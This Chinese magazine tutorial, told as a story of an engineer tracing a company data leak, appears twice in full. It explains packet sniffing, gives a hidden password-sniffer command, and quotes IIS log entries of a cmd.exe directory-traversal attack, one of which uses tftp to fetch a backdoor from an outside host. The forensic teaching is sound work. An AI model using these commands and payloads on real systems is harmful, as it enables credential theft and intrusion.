论文部分内容阅读
本文可以学到
1 网络安全工程师如何处理公司信息泄露的技术
2 如何解决保护服务器日志技巧
3 掌握分析攻击者入侵行为的技巧
什么是Sniffer
Sniffer(嗅探)是一种常用的收集有用数据方法,这些数据可以是用户的账号和密码,可以是一些商用机密数据,也可以是检测内网错误信息等等。最主要应用于管理人员监视公司网络,并可以随时掌握网络的实际情况。在网络性能急剧下降的时候,可以通过Sniffer工具来分析原因,找出造成网络阻塞的来源。当然嗅探也是一把双刃剑,被恶意攻击者利用的话就可能窃取公司机密信息,就如同这次公司档案外泄的案件就是被攻击者在内网使用嗅探技术得到内网中的公共信息导致的。
为什么机密信息也能截获?
Sniffer工作在网络环境中的底层,它会拦截所有的正在网络上传送的数据,并且通过相应的软件处理,可以实时分析这些数据的内容,进而分析所处的网络状态和整体布局,通过Sniffer可以轻易地得到非加密处理的内网中很多机密信息。
容易泄露的秘密
1.口令:这是攻击者使用Sniffer的必然因素,由于Sniffer可以记录到明文传送的userid(用户名)和passwd(密码),我们的服务器管理账号就是在这里被攻击者截取的。
2.金融账号:现在公司很多时候需要在网上使用自己的信用卡或现金账号,然而Sniffer可以很轻松截获在网上传送的用户姓名、口令、信用卡号码、截止日期、账号和pin.
3.邮件和协同办公数据:通过拦截数据包,入侵者可以很方便记录别人之间敏感的信息传送,或者干脆拦截整个的E-mail会话过程。一些公司员工的协同办公数据丢失。
Sniffer工具下载
Sniffer: http://download.enet.com.cn/html/211902001032602.html
MSN Chat Monitor & Sniffer:http://down1.tech.sina.com.cn/download/downContent/2005-03-01/13154.shtml
重要提示:Sniffer软件运行有一定风险,同时对局域网会有比较大的负面影响,有可能会拖慢整个网络,请您慎重选用。
★小编有话说:“天生我才之网络天才”栏目,已经伴随着读者朋友走过了近一年的时间,相信坚持阅读这个栏目的朋友已经初步掌握了网管所需要的一些技能。同时,有一些朋友已经不满足于现状,希望学习更高一级的网络安全工程师的内容。为此,我们决定将“网络天才”定位到“网络安全工程师”,我们专门找到了具有丰富实战经验的网络安全工程师,请他们给您实战演示一下真正的“黑客对抗”!本期我们的话题将是“偷窥”技术……
周日的下午,CSI集团的网络安全工程顾问——“白大虾”与几位同行相约在一个幽静的小酒吧里聚首。当“白大虾”赶到酒吧时,听到以前共事的老朋友正在神侃一段当年自己侦破公司内部资料失窃的光辉历史……
机密被盗
那是两年前的事情了,小白刚刚开始从事网络安全分析师这份工作就遇到棘手的工作。也是一个周日的下午,公司副总裁忽然气急败坏的打电话到网络部吼到:“你们网络部的技术员都是吃白饭的啊!公司的客户列表居然被对手拿到了,限你们1天内把情况搞清楚,否则全部滚蛋!”
公司有“内鬼”?
工程师老刘听到副总的暴怒的内容脑子中闪现出:“内网嗅探数据劫持”。只有公司内部的员工计算机才有可能访问到内网服务器获取重要的信息资料,但是公司内应该没有这种级别的计算机知识人员啊。老刘带着小白进入机房打开服务器细心地检查起来。半个小时过去了,老刘松了一口气说:“终于找到原因了,还好没造成很大的损失。”这次事故估计是竞争对手搞的小动作,攻击者通过WEB服务器进入内网后利用嗅探技术窃取了客户列表,但是由于WEB服务器不是域网关,权限不够,所以没有拿到客户完整资料。由此可以确定不是公司内部员工出的问题,公司分配给WEB服务器的权限远小于数据服务器,而有机会接触服务器的人都有读取数据库的权限。
★思路总结:
只丢失部分资料→用户权限不足→不是“内鬼”→权限较小的服务器是什么?→Web服务器可能最大→能接触Web服务器的人有嫌疑。
顺藤摸瓜
“噢,我明白了,这次公司资料外泄的最大元凶就是嗅探导致的了!但是攻击者是如何进行的嗅探呢?”小白问到。“恩,跟我来,在服务器上我给你讲解一下。”老刘打开10.4.1.1(域网关服务器),说到:“Sniffer在内网工作时,要求嗅探程序运行在网关服务器上才能完全收集到所有(10.4.1.1~10.4.1.255)内网用户的信息。根据Sniffer的工作原理可知道,这次针对公司数据的攻击者是在得到内网服务器的权限后才实现的信息窃取。我们来模拟一下黑客攻击的过程:
在服务器上打开cmd命令行中运行一个功能简易的嗅探器X-sinffer,这个工具可捕获局域网内FTP/SMTP/POP3/HTTP协议的明文密码(见图1)。执行以下命令:xnsiff.exe -pass -hide -log pass.log(见图2)
“小白,你去10.4.1.101计算机上登录到公司的协同办公系统中,向服务器发送一份公司产品报价单。”看到没有,在Sniffer运行的目录下生成的pass.log文档中有如下记录:
19:2710.4.1.101 uiD:xiaobai pass:acttdr
19:2710.4.1.1 houD:baojia.doc to 10.4.1.101 uiD:xiaobai pass:acttdr
“看到了吗?你登录在101上计算机上的用户名和密码都被纪录下来,并且操作行为也有记录。当攻击者得到本地协同办公的登录密码后,就可以进入公司的办公系统,从而轻易获取公司信息。就是这种最简单的内网嗅探攻击行为截取了公司内办公时传送的客户列表。”
图1
图2
★思路总结:
嗅探工具截获了协同办公的密码→进入公司内网→获得客户列表。
白色档案——日志分析
“哦,我大概明白了嗅探的攻击作用,但你又是如何判断到攻击者的攻击行为的呢?”小白又提出新的疑问。“呵呵,那是分析日志得到结果。”老刘分别打开服务器上的多个日志文件:
IIS日志保存在C:winntsystem32LogFilesw3svc1(默认C盘为系统盘的路径)。IIS日志是记录攻击者在对服务器上的网页进行的扫描操作等行为描述。让我们来看看这次的攻击者是怎么入侵公司服务器的:
攻击者向网页服务器提出要求,让服务器送回本身的版本信息:(一般会使用nc.exe探测)
C:>nc -n 10.0.2.55 80
……
Server: Microsoft-IIS/5.0
DatE: Sun, 08 Mar 2007 14:31:00 GMT
……
通过上述信息,攻击者可以确定服务器使用的Windows 2000+IIS5.0系统,进而发动了利用漏洞的入侵。攻击者如果查看本地服务上的目录文件,则日志中会记录下此访问行为:
2007-03-01 08:47:47 202.99.16.17 - 10.4.1.100 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+dir 200 -
通过日志我们可以看到攻击者202.99.16.17利用本地的cmd.exe察看了系统盘内有什么文件。
2007-03-01 08:59:04 202.99.16.17 - 10.4.1.100 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2061.48.10.129%20GET%20cppce.dll%20C:httpodbc.dll
502 -
这里可以看到攻击者利用tftp向61.48.10.129服务器传送了cppce.dll后门。攻击者利用serv-u溢出漏洞攻击服务器,并获取了用户权限。
“这次被入侵的根源已经被找到了,必须要把公司里的安全系统从新整理升级一下。小白有时间多看看入侵案例,从明天开始我带你一起完整地做一次公司的安全规划。”
小提示:Windows的系统重要日志
安全日志文件:%systemroot%system32config SecEvent.EVT
系统日志文件:%systemroot%system32config SysEvent.EVT
应用程序日志文件:%systemroot%system32config AppEvent.EVT
FTP连接日志和HTTPD事务日志:%systemroot% system32LogFiles,
打开注册表HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesEventlog位置,下面的Application、Security、System几个子键,分别对应“应用程序日志”、“安全日志”、“系统日志”。修改注册表的Application、System等子键(见图3)。
图3
★思路总结:
攻击者利用漏洞攻击服务器→上传后门程序,完成日志分析后,发现在系统盘下多了pass.log、x-sinffer.exe等文件→判定攻击者在WEB服务器上运行了嗅探程序。
1 网络安全工程师如何处理公司信息泄露的技术
2 如何解决保护服务器日志技巧
3 掌握分析攻击者入侵行为的技巧
什么是Sniffer
Sniffer(嗅探)是一种常用的收集有用数据方法,这些数据可以是用户的账号和密码,可以是一些商用机密数据,也可以是检测内网错误信息等等。最主要应用于管理人员监视公司网络,并可以随时掌握网络的实际情况。在网络性能急剧下降的时候,可以通过Sniffer工具来分析原因,找出造成网络阻塞的来源。当然嗅探也是一把双刃剑,被恶意攻击者利用的话就可能窃取公司机密信息,就如同这次公司档案外泄的案件就是被攻击者在内网使用嗅探技术得到内网中的公共信息导致的。
为什么机密信息也能截获?
Sniffer工作在网络环境中的底层,它会拦截所有的正在网络上传送的数据,并且通过相应的软件处理,可以实时分析这些数据的内容,进而分析所处的网络状态和整体布局,通过Sniffer可以轻易地得到非加密处理的内网中很多机密信息。
容易泄露的秘密
1.口令:这是攻击者使用Sniffer的必然因素,由于Sniffer可以记录到明文传送的userid(用户名)和passwd(密码),我们的服务器管理账号就是在这里被攻击者截取的。
2.金融账号:现在公司很多时候需要在网上使用自己的信用卡或现金账号,然而Sniffer可以很轻松截获在网上传送的用户姓名、口令、信用卡号码、截止日期、账号和pin.
3.邮件和协同办公数据:通过拦截数据包,入侵者可以很方便记录别人之间敏感的信息传送,或者干脆拦截整个的E-mail会话过程。一些公司员工的协同办公数据丢失。
Sniffer工具下载
Sniffer: http://download.enet.com.cn/html/211902001032602.html
MSN Chat Monitor & Sniffer:http://down1.tech.sina.com.cn/download/downContent/2005-03-01/13154.shtml
重要提示:Sniffer软件运行有一定风险,同时对局域网会有比较大的负面影响,有可能会拖慢整个网络,请您慎重选用。
★小编有话说:“天生我才之网络天才”栏目,已经伴随着读者朋友走过了近一年的时间,相信坚持阅读这个栏目的朋友已经初步掌握了网管所需要的一些技能。同时,有一些朋友已经不满足于现状,希望学习更高一级的网络安全工程师的内容。为此,我们决定将“网络天才”定位到“网络安全工程师”,我们专门找到了具有丰富实战经验的网络安全工程师,请他们给您实战演示一下真正的“黑客对抗”!本期我们的话题将是“偷窥”技术……
周日的下午,CSI集团的网络安全工程顾问——“白大虾”与几位同行相约在一个幽静的小酒吧里聚首。当“白大虾”赶到酒吧时,听到以前共事的老朋友正在神侃一段当年自己侦破公司内部资料失窃的光辉历史……
机密被盗
那是两年前的事情了,小白刚刚开始从事网络安全分析师这份工作就遇到棘手的工作。也是一个周日的下午,公司副总裁忽然气急败坏的打电话到网络部吼到:“你们网络部的技术员都是吃白饭的啊!公司的客户列表居然被对手拿到了,限你们1天内把情况搞清楚,否则全部滚蛋!”
公司有“内鬼”?
工程师老刘听到副总的暴怒的内容脑子中闪现出:“内网嗅探数据劫持”。只有公司内部的员工计算机才有可能访问到内网服务器获取重要的信息资料,但是公司内应该没有这种级别的计算机知识人员啊。老刘带着小白进入机房打开服务器细心地检查起来。半个小时过去了,老刘松了一口气说:“终于找到原因了,还好没造成很大的损失。”这次事故估计是竞争对手搞的小动作,攻击者通过WEB服务器进入内网后利用嗅探技术窃取了客户列表,但是由于WEB服务器不是域网关,权限不够,所以没有拿到客户完整资料。由此可以确定不是公司内部员工出的问题,公司分配给WEB服务器的权限远小于数据服务器,而有机会接触服务器的人都有读取数据库的权限。
★思路总结:
只丢失部分资料→用户权限不足→不是“内鬼”→权限较小的服务器是什么?→Web服务器可能最大→能接触Web服务器的人有嫌疑。
顺藤摸瓜
“噢,我明白了,这次公司资料外泄的最大元凶就是嗅探导致的了!但是攻击者是如何进行的嗅探呢?”小白问到。“恩,跟我来,在服务器上我给你讲解一下。”老刘打开10.4.1.1(域网关服务器),说到:“Sniffer在内网工作时,要求嗅探程序运行在网关服务器上才能完全收集到所有(10.4.1.1~10.4.1.255)内网用户的信息。根据Sniffer的工作原理可知道,这次针对公司数据的攻击者是在得到内网服务器的权限后才实现的信息窃取。我们来模拟一下黑客攻击的过程:
在服务器上打开cmd命令行中运行一个功能简易的嗅探器X-sinffer,这个工具可捕获局域网内FTP/SMTP/POP3/HTTP协议的明文密码(见图1)。执行以下命令:xnsiff.exe -pass -hide -log pass.log(见图2)
“小白,你去10.4.1.101计算机上登录到公司的协同办公系统中,向服务器发送一份公司产品报价单。”看到没有,在Sniffer运行的目录下生成的pass.log文档中有如下记录:
19:2710.4.1.101 uiD:xiaobai pass:acttdr
19:2710.4.1.1 houD:baojia.doc to 10.4.1.101 uiD:xiaobai pass:acttdr
“看到了吗?你登录在101上计算机上的用户名和密码都被纪录下来,并且操作行为也有记录。当攻击者得到本地协同办公的登录密码后,就可以进入公司的办公系统,从而轻易获取公司信息。就是这种最简单的内网嗅探攻击行为截取了公司内办公时传送的客户列表。”
图1
图2
★思路总结:
嗅探工具截获了协同办公的密码→进入公司内网→获得客户列表。
白色档案——日志分析
“哦,我大概明白了嗅探的攻击作用,但你又是如何判断到攻击者的攻击行为的呢?”小白又提出新的疑问。“呵呵,那是分析日志得到结果。”老刘分别打开服务器上的多个日志文件:
IIS日志保存在C:winntsystem32LogFilesw3svc1(默认C盘为系统盘的路径)。IIS日志是记录攻击者在对服务器上的网页进行的扫描操作等行为描述。让我们来看看这次的攻击者是怎么入侵公司服务器的:
攻击者向网页服务器提出要求,让服务器送回本身的版本信息:(一般会使用nc.exe探测)
C:>nc -n 10.0.2.55 80
……
Server: Microsoft-IIS/5.0
DatE: Sun, 08 Mar 2007 14:31:00 GMT
……
通过上述信息,攻击者可以确定服务器使用的Windows 2000+IIS5.0系统,进而发动了利用漏洞的入侵。攻击者如果查看本地服务上的目录文件,则日志中会记录下此访问行为:
2007-03-01 08:47:47 202.99.16.17 - 10.4.1.100 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+dir 200 -
通过日志我们可以看到攻击者202.99.16.17利用本地的cmd.exe察看了系统盘内有什么文件。
2007-03-01 08:59:04 202.99.16.17 - 10.4.1.100 80 GET
/_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe
/c+tftp%20-i%2061.48.10.129%20GET%20cppce.dll%20C:httpodbc.dll
502 -
这里可以看到攻击者利用tftp向61.48.10.129服务器传送了cppce.dll后门。攻击者利用serv-u溢出漏洞攻击服务器,并获取了用户权限。
“这次被入侵的根源已经被找到了,必须要把公司里的安全系统从新整理升级一下。小白有时间多看看入侵案例,从明天开始我带你一起完整地做一次公司的安全规划。”
小提示:Windows的系统重要日志
安全日志文件:%systemroot%system32config SecEvent.EVT
系统日志文件:%systemroot%system32config SysEvent.EVT
应用程序日志文件:%systemroot%system32config AppEvent.EVT
FTP连接日志和HTTPD事务日志:%systemroot% system32LogFiles,
打开注册表HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesEventlog位置,下面的Application、Security、System几个子键,分别对应“应用程序日志”、“安全日志”、“系统日志”。修改注册表的Application、System等子键(见图3)。
图3
★思路总结:
攻击者利用漏洞攻击服务器→上传后门程序,完成日志分析后,发现在系统盘下多了pass.log、x-sinffer.exe等文件→判定攻击者在WEB服务器上运行了嗅探程序。